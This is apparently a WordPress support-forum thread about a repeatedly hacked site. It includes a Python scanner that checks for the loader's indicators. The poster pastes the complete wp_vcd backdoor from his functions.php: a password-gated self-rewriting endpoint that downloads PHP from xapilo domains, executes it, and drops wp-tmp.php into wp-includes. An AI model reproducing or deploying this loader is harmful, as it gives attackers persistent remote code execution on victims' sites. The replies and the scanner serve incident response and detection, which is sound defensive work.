• Resolved ronwisely

    (@ronwisely)


    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '9dd24009f5c1833f1f6b07ba726516c1'))
    	{
    $div_code_name="wp_vcd";
    		switch ($_REQUEST['action'])
    			{
    
    				
    
    				case 'change_domain';
    					if (isset($_REQUEST['newdomain']))
    						{
    							
    							if (!empty($_REQUEST['newdomain']))
    								{
                                                                               if ($file = @file_get_contents(__FILE__))
    		                                                                    {
                                                                                                     if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                                 {
    
    			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
    			                                                                           @file_put_contents(__FILE__, $file);
    									                           print "true";
                                                                                                                 }
    
    		                                                                    }
    								}
    						}
    				break;
    
    								case 'change_code';
    					if (isset($_REQUEST['newcode']))
    						{
    							
    							if (!empty($_REQUEST['newcode']))
    								{
                                                                               if ($file = @file_get_contents(__FILE__))
    		                                                                    {
                                                                                                     if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                                 {
    
    			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
    			                                                                           @file_put_contents(__FILE__, $file);
    									                           print "true";
                                                                                                                 }
    
    		                                                                    }
    								}
    						}
    				break;
    				
    				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    			}
    			
    		die("");
    	}
    
    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if(!function_exists('theme_temp_setup')) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
            
            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }
            
            function theme_temp_setup($phpCode)
            {
                $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
               if( fwrite($handle, "<?php\n" . $phpCode))
    		   {
    		   }
    			else
    			{
    			$tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
    			fwrite($handle, "<?php\n" . $phpCode);
    			}
    			fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            
    
    $wp_auth_key='11222848a10f1d0ea555bcdf773f3eb4';
            if (($tmpcontent = @file_get_contents("https://www.xapilo.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.xapilo.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    
                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            }
            
            
            elseif ($tmpcontent = @file_get_contents("https://www.xapilo.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
    
    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            } 
    		
    		        elseif ($tmpcontent = @file_get_contents("https://www.xapilo.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
    
    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            }
    		elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
               
            } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 
    
            } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 
    
            } 
            
            
            
            
            
        }
    }
    
    //$start_wp_theme_tmp
    
    //wp_tmp
    
    //$end_wp_theme_tmp
    ?>

    Respected sir, someone added the above code into my function.php files. This is the 5th time he has added it to my website. I have already cleaned all my content so many times; I need a permanent solution, people, help. He is adding the above-mentioned code via wp-includes. Inside wp-includes there were 2 files; I deleted them too. No one can log in to my website, because I have disabled the wp-login.php page.
    Hope to get a permanent solution and the cause.
    Regards,
    rahul

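The sample above rewrites its own host file between the `//$start_wp_theme_tmp` and `//$end_wp_theme_tmp` markers, writes the fetched payload to `wp-includes/wp-tmp.php` (falling back to the theme directory or the current directory), and on later requests re-includes whichever copy it finds, so cleaning functions.php alone leaves the loader in place. The following added example, which is not code from this thread or from WordPress, is an indicator scan a defender can run over every site in a shared hosting account to confirm that all copies are gone. The indicator strings are taken verbatim from the posted sample; the sample site it builds, the `build_sample_site` and `demo` helpers, and the placeholder `wp-tmp.php` content are constructed for the demonstration and contain no loader logic.

```python
"""
Indicator scan for the wp_vcd-style loader shown in the thread above.

Added example (not code from the thread or from WordPress): walks a
WordPress tree and flags files carrying the markers visible in the posted
sample, so a cleanup can be verified across every site in a hosting account.
"""
from __future__ import annotations

import os
import re
import tempfile
from pathlib import Path

# Patterns built from strings that appear verbatim in the posted sample.
INDICATORS = {
    "wp_vcd_marker": re.compile(r"\$div_code_name\s*=\s*['\"]wp_vcd['\"]"),
    "theme_tmp_block": re.compile(r"//\$start_wp_theme_tmp[\s\S]*?//\$end_wp_theme_tmp"),
    "remote_loader": re.compile(r"function\s+theme_temp_setup\s*\("),
    "wp_tmp_dropper": re.compile(r"wp-includes/wp-tmp\.php"),
    "self_rewrite": re.compile(r"file_put_contents\(\s*__FILE__"),
}

# The sample drops this file name into wp-includes, the theme directory or
# the current directory; its presence anywhere in the tree is a finding.
DROPPED_FILE_NAME = "wp-tmp.php"


def scan_file(path: Path) -> list[str]:
    """Return the names of indicators matched in a single PHP file."""
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk a WordPress install and map relative path -> matched indicators."""
    findings: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.endswith(".php"):
                continue
            p = Path(dirpath) / fname
            hits = scan_file(p)
            if fname == DROPPED_FILE_NAME:
                hits.append("dropped_file_present")
            if hits:
                findings[p.relative_to(root).as_posix()] = hits
    return findings


# Constructed fixtures: a clean functions.php and one carrying only the
# textual markers the scanner keys on (no loader code).
CLEAN_FUNCTIONS = "<?php\nadd_action('init', function () { /* theme code */ });\n"
INFECTED_FUNCTIONS = (
    "<?php\n$div_code_name=\"wp_vcd\";\n"
    "//$start_wp_theme_tmp\n//wp_tmp\n//$end_wp_theme_tmp\n?>\n"
    + CLEAN_FUNCTIONS
)


def build_sample_site(root: Path) -> None:
    """Create a minimal constructed WordPress tree with one clean and one injected theme."""
    (root / "wp-includes").mkdir(parents=True)
    (root / "wp-content/themes/clean").mkdir(parents=True)
    (root / "wp-content/themes/injected").mkdir(parents=True)
    (root / "wp-content/themes/clean/functions.php").write_text(CLEAN_FUNCTIONS)
    (root / "wp-content/themes/injected/functions.php").write_text(INFECTED_FUNCTIONS)
    # Stand-in for the dropped loader file; content is a placeholder comment only.
    (root / "wp-includes" / DROPPED_FILE_NAME).write_text("<?php /* placeholder */\n")


def demo() -> dict[str, list[str]]:
    """Build the constructed site in a temp dir and return the scan findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_site(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, hits in sorted(demo().items()):
        print(f"{rel}: {', '.join(hits)}")
```

Run `scan_tree(Path("/path/to/public_html"))` against each account on the server rather than one site at a time; as the later replies note, sites sharing one hosting plan share a file system, so a loader left in any one of them can reinfect the others.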

Viewing 4 replies - 1 through 4 (of 4 total)
  • Hi rahul,

    Sorry to hear your site is hacked. It sounds like you should probably hire an expert to do a forensic analysis on your site to determine how the attackers are gaining entry. It could be via a vulnerability in a plugin or theme, it could be a backdoor located in a hard to find location, or even a server side vulnerability.

    If you want to continue investigating by yourself, this guide to cleaning a hacked website may help. However, I will reiterate that some infections require a trained security expert to resolve.

    Best of luck with your site for now.

    • This reply was modified 6 years, 9 months ago by wfasa.
    Thread Starter ronwisely

    (@ronwisely)

    Respected mam,
    I can clean my website manually in 5 minutes. I have refreshed all my files, and all my plugin and theme authors are elite authors. No other files are getting malicious content except 3 files in one website folder: 2 files are from wp-includes and one file is function.php. And that function.php is getting affected because of wp-includes of the WordPress core files, which means they are able to upload files in wp-includes. (File editing is disabled via the config file.)
    One strange case I have seen: I have a total of 3 domains in my cPanel, and in all the domains wp-includes got the same malicious file, uploaded at the same time inside the same folder. If it is done by a hacker then he will at least take some time to hack another website. Is it possible to hack all the websites' cPanel files at the same instant? And in my cPanel the last login was from my IP.

    Last time the same thing was happening with one of my clients where I did malware cleaning. Someone was able to upload the same files at the same time in a particular folder in all the domains. He was also hosting with HostGator and they kept on asking him to buy SiteLock.
    The same condition is happening to my website too. Are they really a hacker or is it a complete game of SiteLock and hostgator.com? I am really getting doubts. Even those SiteLock bots got trapped in the honeypot so many times. They never obey our robots.txt file.
    For security I am using Wordfence with the iThemes .htaccess file and with the Bullet plugin .htaccess files. The login page is disabled and protected with an .htaccess password. All execution in the upload directory is blocked. All bad requests done by bots, tracked by Wordfence live tools, are manually blocked by me via .htaccess code. But still they can gain access; is he really a hacker?

    I really need some small guidance, mam.

    Regards,
    rahul

    @ronwisely,

    Regardless of whether you choose to utilize the SiteLock service offered via HostGator, or any vendor at all, it’s important to understand how this happened. I would first like to reiterate what @wfasa mentioned, that this is almost certainly a breach due to vulnerable code rather than a compromised cPanel. When multiple websites are hosted within the same hosting plan, there is little to stop malware from spreading between them, as they share the same file structure. I’m glad to hear that you’ve been successful in removing the malware; your next steps should be to get a second set of eyes to verify that the website is clean, and track down the vulnerability or vulnerabilities that led to this compromise in the first place. For these steps I do recommend utilizing professional services, as this can be a very involved process.

    Rahul,
    Yes, it is possible for one site to infect another. I don’t have much to add aside from what @logankipp said. Nobody will be able to say how your site was hacked without doing a proper forensic analysis which takes at least a few hours. It involves going through every file on the server, checking for malware and vulnerabilities. There are several different services out there that you can choose from.

    I hope you are able to find the help you need.

  • The topic ‘Hacked content need permanent solution’ is closed to new replies.